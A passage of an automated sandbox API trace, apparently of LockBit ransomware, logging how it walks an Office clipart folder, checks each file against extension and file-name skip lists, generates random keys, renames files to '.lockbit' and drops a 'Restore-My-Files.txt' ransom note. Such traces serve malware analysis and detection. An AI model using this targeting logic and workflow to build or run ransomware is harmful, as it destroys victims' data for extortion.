-1 [0176.664] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0176.664] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0176.665] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0176.665] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0176.665] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.665] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0176.665] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0176.665] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0176.665] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0176.665] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0176.665] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0176.665] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0176.665] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0176.665] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0176.665] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0176.665] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0176.665] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0176.665] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0176.665] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0176.665] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0176.665] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0176.665] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0176.665] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.665] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0176.665] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0176.665] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0176.665] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0176.665] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO02054_.WMF") returned -1 [0176.666] lstrcmpiW (lpString1="ntldr", lpString2="SO02054_.WMF") returned -1 [0176.666] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO02054_.WMF") returned -1 [0176.666] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO02054_.WMF") returned -1 [0176.666] lstrcmpiW (lpString1="autorun.inf", lpString2="SO02054_.WMF") returned -1 [0176.666] lstrcmpiW (lpString1="thumbs.db", lpString2="SO02054_.WMF") returned 1 [0176.666] lstrcmpiW (lpString1="iconcache.db", lpString2="SO02054_.WMF") returned -1 [0176.666] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0176.666] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02054_.WMF") returned=".WMF" [0176.666] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0176.666] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0176.666] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0176.666] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0176.666] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0176.666] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0176.666] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0176.666] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0176.666] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0176.666] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0176.666] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0176.666] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0176.666] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0176.666] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0176.666] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0176.666] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0176.666] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0176.667] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0176.667] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0176.667] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0176.667] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0176.667] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0176.667] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0176.667] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0176.667] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0176.667] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0176.667] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0176.667] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0176.667] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02054_.WMF.lockbit") returned 72 [0176.667] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02054_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02054_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0176.671] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0176.671] malloc (_Size=0x40068) returned 0x1ff1e60 [0176.671] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=12490) returned 1 [0176.672] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.672] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.672] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0176.672] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.672] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.672] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0176.672] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0176.674] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02054_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02054_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.674] malloc (_Size=0xa6) returned 0x1fa2ed8 [0176.674] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0176.675] free (_Block=0x1fa2ed8) [0176.675] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02054_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0176.676] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0176.676] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0176.676] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8cec4700, ftCreationTime.dwHighDateTime=0x1bd4be9, ftLastAccessTime.dwLowDateTime=0x6d358650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8cec4700, ftLastWriteTime.dwHighDateTime=0x1bd4be9, nFileSizeHigh=0x0, nFileSizeLow=0x4c4c, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO02055_.WMF", cAlternateFileName="")) returned 1 [0176.676] lstrcmpiW (lpString1=".", lpString2="SO02055_.WMF") returned -1 [0176.676] lstrcmpiW (lpString1="..", lpString2="SO02055_.WMF") returned -1 [0176.676] PathFindExtensionW (pszPath="SO02055_.WMF") returned=".WMF" [0176.676] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0176.676] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0176.676] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0176.683] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0176.683] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0176.683] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0176.683] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0176.683] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0176.683] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0176.683] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0176.685] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0176.685] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0176.685] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0176.685] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0176.685] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0176.685] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0176.685] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0176.685] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0176.685] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0176.685] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0176.685] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0176.685] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0176.685] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0176.685] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0176.685] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.685] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0176.685] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0176.685] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0176.685] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0176.685] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0176.685] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0176.685] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0176.685] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0176.685] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0176.685] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0176.686] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0176.686] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0176.686] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0176.686] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0176.686] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0176.686] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0176.686] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0176.686] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.686] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0176.686] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0176.686] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0176.686] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0176.686] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO02055_.WMF") returned -1 [0176.686] lstrcmpiW (lpString1="ntldr", lpString2="SO02055_.WMF") returned -1 [0176.686] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO02055_.WMF") returned -1 [0176.686] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO02055_.WMF") returned -1 [0176.686] lstrcmpiW (lpString1="autorun.inf", lpString2="SO02055_.WMF") returned -1 [0176.686] lstrcmpiW (lpString1="thumbs.db", lpString2="SO02055_.WMF") returned 1 [0176.686] lstrcmpiW (lpString1="iconcache.db", lpString2="SO02055_.WMF") returned -1 [0176.686] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0176.686] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02055_.WMF") returned=".WMF" [0176.686] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0176.686] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0176.686] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0176.686] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0176.686] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0176.686] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0176.686] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0176.686] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0176.686] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0176.686] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0176.686] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0176.686] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0176.687] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0176.687] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0176.687] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0176.687] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0176.687] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0176.687] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0176.687] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0176.687] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0176.687] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0176.687] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0176.687] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0176.687] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0176.687] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0176.687] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0176.687] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0176.687] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0176.687] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02055_.WMF.lockbit") returned 72 [0176.687] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02055_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02055_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0176.688] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0176.688] malloc (_Size=0x40068) returned 0x3df0008 [0176.688] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=19532) returned 1 [0176.689] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.689] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.689] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0176.689] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.690] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.690] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0176.690] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0177.003] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02055_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02055_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.003] malloc (_Size=0xa6) returned 0x1fa2ed8 [0177.003] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0177.004] free (_Block=0x1fa2ed8) [0177.004] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02055_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.004] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.004] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.004] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8362df00, ftCreationTime.dwHighDateTime=0x1bd4be9, ftLastAccessTime.dwLowDateTime=0x5aa8af30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8362df00, ftLastWriteTime.dwHighDateTime=0x1bd4be9, nFileSizeHigh=0x0, nFileSizeLow=0x382a, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO02067_.WMF", cAlternateFileName="")) returned 1 [0177.004] lstrcmpiW (lpString1=".", lpString2="SO02067_.WMF") returned -1 [0177.004] lstrcmpiW (lpString1="..", lpString2="SO02067_.WMF") returned -1 [0177.004] PathFindExtensionW (pszPath="SO02067_.WMF") returned=".WMF" [0177.004] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0177.004] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0177.004] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0177.005] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0177.005] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0177.005] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0177.005] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0177.005] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0177.005] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0177.005] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0177.005] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0177.005] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0177.005] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0177.005] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0177.005] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0177.005] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0177.005] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0177.005] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0177.005] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0177.005] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0177.005] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0177.005] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0177.005] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0177.005] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0177.005] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.005] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0177.005] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0177.005] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0177.005] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0177.005] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0177.005] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0177.005] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0177.006] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0177.006] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0177.006] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0177.006] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0177.006] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0177.006] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0177.006] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0177.006] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0177.006] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0177.006] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0177.006] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.006] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0177.006] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0177.006] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0177.006] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0177.006] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO02067_.WMF") returned -1 [0177.006] lstrcmpiW (lpString1="ntldr", lpString2="SO02067_.WMF") returned -1 [0177.006] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO02067_.WMF") returned -1 [0177.006] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO02067_.WMF") returned -1 [0177.006] lstrcmpiW (lpString1="autorun.inf", lpString2="SO02067_.WMF") returned -1 [0177.006] lstrcmpiW (lpString1="thumbs.db", lpString2="SO02067_.WMF") returned 1 [0177.006] lstrcmpiW (lpString1="iconcache.db", lpString2="SO02067_.WMF") returned -1 [0177.006] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.006] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02067_.WMF") returned=".WMF" [0177.006] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0177.006] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0177.006] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0177.006] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0177.006] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0177.006] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0177.007] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0177.007] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0177.007] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0177.007] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0177.007] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0177.007] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0177.007] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0177.007] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0177.007] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0177.007] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0177.007] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0177.007] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0177.007] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0177.007] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0177.007] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0177.007] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0177.007] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0177.007] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0177.007] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0177.007] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0177.007] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0177.007] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0177.007] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02067_.WMF.lockbit") returned 72 [0177.007] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02067_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02067_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0177.008] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.008] malloc (_Size=0x40068) returned 0x1ff1e60 [0177.008] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=14378) returned 1 [0177.008] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.009] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.009] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0177.009] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.009] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.009] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, 